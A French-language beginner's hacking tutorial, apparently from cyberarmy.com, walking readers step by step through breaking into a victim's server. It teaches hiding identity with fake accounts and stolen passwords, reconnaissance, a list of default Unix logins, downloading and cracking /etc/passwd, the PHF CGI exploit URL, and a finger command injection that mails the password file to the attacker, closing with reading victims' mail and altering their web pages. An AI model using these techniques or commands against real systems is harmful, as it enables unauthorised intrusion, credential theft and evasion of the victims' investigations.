[Je veux commencer par le début]

[Je connais deja et je veux aller + loin]


 

INTRODUCTION:


Quelques commentaires sont necessaires avant de parler de techniques de hack.

Quand nous parlons de ‘Hacking’, nous parlons d'avoir un accés sur un serveur que nous n'avons pas. Les serveurs sont configurés pour que plusieurs personnes puissent les utiliser. Chaque personne a un compte (account) différent sur le serveur . Si Fred à un account avec ISP (Internet Service Provider), il lui sera donné :

(1) un nom (login name) , qui est le même que son repertoire ; et
(2) un mot de passe (password) , qui lui donne l'accés à ce repertoire.

Le login name et le password donneront accés à tout les services de Fred - e-mail , news , services et pages web. Il y a aussi un account 'root' , qui a ses propres login et password. Il donne un accés super-utilisateur au serveur tout entier. Nous allons nous pencher sur cette possibilité dans ce guide.

 

 

[Ok, je veux aller jusqu'a 'anatomie du hack']

[ Je connais deja tout çà envoie moi directement au hack]

 


 

L'ANATOMIE DU HACK :

Il y a deux manières de s'infiltrer dans un système. Imaginer un serveur comme le coffre fort d'une banque suisse.Il y a deux moyens d'y entrer. Vous pouvez essayer en trouvant la combinaison du coffre. C'est comme chercher un password.La seconde possibilité c'est d'utiliser la dynamite. Vous oubliez toutes les manières‘propre’ pour vous infiltrer. C'est comme utiliser des ‘exploits’ ou passer par les points faible de l'OS du serveur pour y avoir accés.

 

 

[Ok, Let's Go! Mais dis moi je risque pas de me faire niquer ?]

[C'est bon je sais comment ne pas me faire niquer,c'est pour les newbies ce truc ?!]


 

'NE PAS SE FAIRE NIQUER':


Le Hacking est illegal, et il est très facile de vous tracez si realize que vous les avez hacker. Où que vous alliez,
votre adresse ip (l'identification unique de votre ordinateur) reste et est souvent loggé. Solutions:

1. Quand vous installer un compte avec un ISP, donner un faux nom et une fausse adresse. Ou, mieux encore , signer pour un compte anonyme chez anonymizer.com
ici.

 

 

[Nah,j'ai pas trop envie de faire çà , y a quoi comme autres trucs ?]

[Ok j'utilise deja cette arnaque que puis je faire d'autres ?]

[Stop ! Je sais DEJA comment ne pas se faire griller on passe à la technique ?]


 

'NE PAS SE FAIRE NIQUER':

2. Hacker en utilisant un faux compte (password perdu, etc.). Un outil appelé Dripper peut voler des passwords pour vous depuis des cybercafés ou des bibliothèques.

 

[Nah,dis moi juste quelque chose de facile que je peux faire maintenant !]

[Ok, c'est fait. Rien d'autre à faire ?]


 

'NE PAS SE FAIRE NIQUER':

3. Pointer vos paramètres de connection ailleurs.

Vous pouvez le faire facilement en changeant vos paramètres Proxy. En utilisant les paramètres d'un ISP different , çà fera style tu surfes par cet ISP là mais en fait non kapishé ?. Une liste de proxies est dispo ici.

Si vous voulez le super anonymat ! , vous devriez surfer avec un compte enregistré sous un faux nom et avec vos paramètres proxy modifiés.Vous pouvez aussi surfer a travers l'applet IP Jamming!.Soyez conscient que certains ISP peuvent tester votre connection...a vous de voir.


[Ok, Je suis protéger à donf !... Now, I want to HACK!]


 

RASSEMBLER DES INFOS:

Pour bien commencer, vous aurez besoin de recolter des informations a propos de www.
en utilisant des outils internet..

 

[Ok, Comment ?]

[Non, j'ai deja chopper toutes les infos , dis moi juste ce qu'il faut faire]


 

LE CHOPPAGE D'INFOS:

Nous allons maintenant commencer par la première étape de tout bon hack qui se respecte....le "le choppage d'info"

Prenez un calpin , et ouvrez une nouvelle fenetre de votre navigateur (par l'intermédiare de l'IP Jammer). Allez sur le site www. . Vous pouvez trouver l'applet IP jamming sur Cyberarmy.Com.

 

[Ok, et maintenant ?]


 

IDENTIFIER VOTRE VICTIME:

1. D'abord allez sur le site "victime". Recopiez toutes les adresses e-mail présentes , copiez également le code HTML des pages importantes.

 

[ C'est fait quoi d'autres ?]


 

 

L'ARNAQUE DE L'ERREUR DE MAIL:

2. Envoyer un e-mail a une personne inexistante . Si le site est www. , envoyer un mail à blahblahblah@. Un message d'erreur vous parviendra par e-mail et contiendra des informations sur le serveur cible.

Recopiez ces infos.

(Pour garder l'anonymat, ce serai une bonne idée d'envoyer et de recevoir le mail par l'intermédiaire d'un provider gratuit comme hotmail.com. Cela vous protegera quand ils verifieront le log après que vous les ayez hacker.)

 

[C'est fait quoi d'autres ??]


 

TRACEROUTE:

3. Toujours en gardant l'anonymat , tracer à l'aide du champs de recherche ci-dessous

Cela vous indiquera l'origine du provider du serveur de la victime.

 

TOOLS

 

 

[Ok, quoi ensuite ??]


 

WHOIS:

3. Toujours en gardant l'anonymat, faites un Whois sur le site. La recherche Whois est disponible ci-dessous.

Cela vous donnera des infos sur la personne qui possède le site et qui le fait tourner.

 

TOOLS

 

 

[Ok, quoi ensuite ??]


 

L'OUTILS FINGER:

4.  Maintenant nous allons utiliser l'outil Finger. D'abord utiliser le finger comme suit : “finger @”. Parfois cela vous donne les noms de tout les comptes présents sur le serveur. Si cela ne marche pas , essayez le finger sur les adresses e-mail que vous avez chopper sur le site et grâce à l'outil Whois. Cela vous donne parfois des infos très importantes pour la suite des opérations.

 

FINGER
@

 

 

[Ok, quoi ensuite ??]


 

LE SCAN DE LA MORT:

5. Maintenant nous allons scanner tout les ports du site.

Le scan permet de verifier tout les ports ouverts pour une IP. Cette étape est très importante, cependant , cela préviens le webmaster que son site va se faire hacker. Il n'y a aucune raison légitime pour scanner un site sauf si vous voulez le hacker :)

Il n'y a pas de techniques sures pour cacher un scan port , mais li existe quelques scanner de port qui permettent cette option. La plupart sont seuleument pour les systèmes Linux / Unix . Sinon , utilisez l' Exploit Generator pour Windows . Cependant , si vous voulez penetrez un site TRES securisé , Nous vous conseillons d'oublier le scan pour le moment tant que vous vous serz pas mis à Linux.

Ok ! , Le scan des ports vous permettra de savoir quels services le site est en train de faire tourner. Si le port 21 est ouvert cela veut dire qu'ils ont un serveur FTP . Si le port 23 est ouvert cela veut dire qu'ils ont TELNET.

[Ok, quoi ensuite ??]


 

TELNET:

5. L'utilité de Telnet est qu'il permet de trouver à quel type de serveur vous avez affaire. Vous pouvez utiliser le telnet (à 2 balles !) de zindaube où utiliser d'autres telnet que l'on peut trouver un peut partout

Utilisez telnet sur le site cible par le port 23. Habituellement , si l'adresse est “www. ”, essayez telnet avec "". Si cela ne marche pas , essayez telnet avec telnet. ou essayez avec les diverses informations que vous avez trouver plus haut . Une fois que vous y avez accés , notez toutes les informations qu'ils vous donne notament le type de serveur.

 

[Ca marche ! j'ai le type de serveur !]

[Nop ! rien ne marche :(]

 


 

TELNET:

Maintenant changez le port telnet au port 21. Cela va vous envoyer à leur serveur FTP. Si çà marche essayez de taper SYST pour savoir de quel type de serveur il s'agit.

 

[CA marche !]

[Toujours pas :((]


 

TELNET:

Maintenant si vous êtes chanceux mettez le port sur 80 (c'est le port HTTP). Notez les informations reçues.

 

[Ouf ! çà marche enfin !]

[Je ne suis qu'un lame mais je veux perseverer !]


 

UTILISER DES PROGRAMMES LAME:

Vous avez BESOIN de savoir de quel type de serveur il sagit avant de hacker quoi que ce soit. Comment voulez vous ensuite utiliser des exploits si vous n'êtes même pas au courant du type de la machine ??

Une des dernières solutions et d'utiliser un programme appelé Whats Running? Cela ne marche pas très bien , mais défois il arrive à vous sortir le type de serveur. Il sera certainement loggé sur le serveur de la visctime.

Si çà ne marche toujours pas demerdez vous pour trouver cette info ! sans çà pas de hack !. Essayer aussi d'envoyer un e-mail en demandant quel type d'OS ils utilisent , des fois çà marche !!.

 

[Ok ! Maintenant j'ai les infos ! je veux avoir l'accès au serveur !]


 

HACKER A PARTIR DU PASSWORD:

Maintenant nous allons essayer de trouver la combinaison du pass pour rentrer dans le serveur.

 

[Ok, Je veux être root !!]

[Nah, je sais deja que ce serveur va necessiter un "exploit"]


 

D'ABORD ESSAYER DES TRUCS SIMPLES:


Unix s'installe avec des pass par défaut et parfois ils ne sont pas changés. Alors , on telnet .

Utilisez un autre Telnet que celui de windaube car sinon votre adresse ip sera loggée par .
Ensuite essayez les accounts et pass suivants :

ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon

Les accounts root, mountfsys, umountfsys, install, sont des acconts root , ce qui veut dire qu'ils vous permettrent d'être le "super utilisateur" de la bécane et d'avoir tout les pouvoirs. Les autres logins sont juste "user level" ils ont un accés limité a leurs fichiers et services.

 

[Nup...çà marche po !]

[Incroyable ! ce truc de lamer fini fonctionne à merveille !]


 

UTILISER LES NOMS COMME LOGIN ET PASSWORD:

Encore un truc simple. Entre 1 et 20 personnes par serveur sont assez stupides pour avoir le même login et password.Utilisez les informations que vous avez choppées avec les adresses e-mail et le Whois.

Par exemple si le site web fait référence à robert @ , essayer de vous logger (par Telnet ou FTP
) comme:

$Login: Fred
$Password: Fred

Faites çà avec tout les noms que vous avez trouver - vous pourriez être chanceux :)).

Ca marche ?

 

[Nah,ils ont une putain de sécurité çà ne marche pas ! ]

[Oh, cool ! j'ai accés à un account !!]


 

CHOPPER LE FICHIER PASSWD

Vous n'avez probablement pas de chance jusqu'a maintenant.

Admettons que vous essayer de penetrer un système UNIX , maintenant il faut vous interessez à comment le sytème VERIFIE le password que vous lui indiquer. Il y a un fichier appelé ‘passwd’ sur tout les systèmes UNIX ce fichier contient tout les password pour tout les utilisateurs.Donc si vous ne pouvez pas deviner le password , nous allons essayer de chopper ce fichier et de le decrypter.

 

[Ok ! allons y !]


 

ANCIENNE METHODE CHINOISE PAR FTP:

Votre browser devrait être configuré pour utiliser de faux proxy. Nous utiliserons ce même browser pour le FTP , car il ne peut pas être tracer facilement , alors qu'un programme comme CUteFTP peut être tracer car il ne peut pas utiliser de faux proxy.Si dans votre scan vous avez trouver le port 21 ouvert c'est une très bonne indication car cela veut dire que la victime a un serveur FTP.

Utilisez votre browser , essayez en FTP avec . Exemple: ftp://

Si cela ne marche pas , essayez toujours en FTP avec ftp. . Exemple: ftp://ftp.

Si çà ne marche pas, essayez avec FTP les noms de domaines des serveurs que vous avez chopper avec la recherche Whois. Exemple: ftp://ns1.

 

[Ok, j'y suis !]

[Nah, çà marche pas et çà commence à prendre la tête , mais je vais quand même le faire :)) ! ]


 

ANCIENNE METHODE CHINOISE PAR FTP:

Maintenant que vous êtes connecté au serveur FTP de , clikez sur le repertoire /etc.

Vous devriez voir un fichier nommé ‘passwd’et peut être aussi un fichier appelé ‘group’. Downloader le fichier ‘passwd’ file et mattez le.

Si vous êtes chanceux il devrait ressembler à çà :

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]

Par exemple ,nous voyons qu'il y a un loggin “kangaroo” et son password crypté est “3A62i9qr”. Note -ce n'est PAS son password mais une forme CRYPTE de son pass.

Ou alors ce la ressemble plutot à çà :

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

Si la section du pass est formé par des * ou des x , c'est mauvais !– on dit que le fichier passwd est shadowed
les pass ne peuvent être decryptés dans ce cas là. Aujourd'hui la plupart des fichiers passwd sont shadowed.Cependant , si vous avez un
fichier passwd qui est non-shadowed , vous pouvez le decrypter ! .

[Nah, mon fichier passwd est complétement shadowed]

[Nah, je ne trouve pas le fichier passwd]

[Cool ! je suis tombé sur un fichier non-shadowed]


 

DECRYPTER UN FICHIER PASSWD:

il y a pleins de programmes sur le net qui permettent de cracker des password Unix on les appelle des "password cracker" . Le plus connu est ‘Cracker Jack’.Beaucoup de e-mag recommande ce programme mais c'est plus par tradition que par efficacité !. Ce programme est vieux et crash encore beaucoup de machine , car il utilise des allocations mémoires.

Le meilleur password cracker du moment est 'John the Ripper 1.5’. Il est facilement trouvable. Il est très rapide et même optimisé pour PII et K6-2. John the Ripper utilise la "brute force attack". Mais il ne tourne que sous MS-DOS.

Vous aurez aussi besoin d'un ‘wordfile’, il s'agit d'un fichier contenant des mots , le cracker va utiliser ce fichier pour cracker des mots de pass. Plus la wordlist est BIG plus le cracker as de chance de trouver les password.

 

[Oui ! j'ai récupperer des pass!]

[Nah, le cryptage est trop balèze !]

 


 

LA TECHNIQUE OLD-STYLE DU PHF :

Aujourd'hui la plupart des serveurs ont supprimé leur programme PHF, testez quand même :)... si çà marche vous pourrez chopper le fichier passwd, même si il est caché ou reservé à l'accés root.

Dans l'Overlord Anonymizer , tapez::

http://www./cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.

OVERLORD ANONYMIZER

 

Si PHF est actif (souvent il ne l'est plus), toutes les infos s'afficherons dans votre navigateur !.

 

[Nah, ils ont grillé le bug PHF depuis 10 ans man !]

[Yes! j'ai choppé quelques pass crypté !!]


 

FINGER BOX HACKING:

Les serveurs Finger sont les mais des hackers !. Nous allons capté si www. à un serveur finger.

Dans l'Anonymizer tapez www./cgi-bin/finger

OVERLORD ANONYMIZER

Si çà marche vous avez encore une chance de récupperer le fichier etc/passwd.

Ok !, 1/ prenez votre calepin ou vous avez noter les adresse e-mail du site (admettons q'une de ces adresses soit "kangaroo@"et que votre adresse e-mail est "your@email.org")

2/ Retournez a la finger box, et tapez ceci : (en changeant les adresses e-mail par les reelles ! on sait jamais , lame is lame :))):

kangaroo@; /bin/mail your@email.org < etc/passwd

Ce truc va chopper le fichier passwd par kangaroo@ et vous l'envoyer a VOTRE adresse e-mail !. Si çà marche vous avec le fichier passwd dans votre box !.... Vous pouvez maintenant lancer un password cracker pour le decrypter.

 

[Nah, çà marche pas]

[Oui ! j'ai enfin choppé ce fichier !]

 


 

FELICITATIONS !:

Vous avez accés au serveur !.

Maintenant si vous avez un login et un pass , vous pouvez utiliser le compte mail de l'utilisateur, utiliser le FTP et modifier les pages web du serveur !

Voila c'est la fin de ce tutorial , j'espère qu'il vous aura aider ! Dans le cas contraire , si votre cible est la nasa ou les lanceurs Arianne , patientez un petit peu pour la section Linux qui débarque bientôt ! N'oubliez pas que sous zin le hacking est très limité !!!


www.cyberarmy.com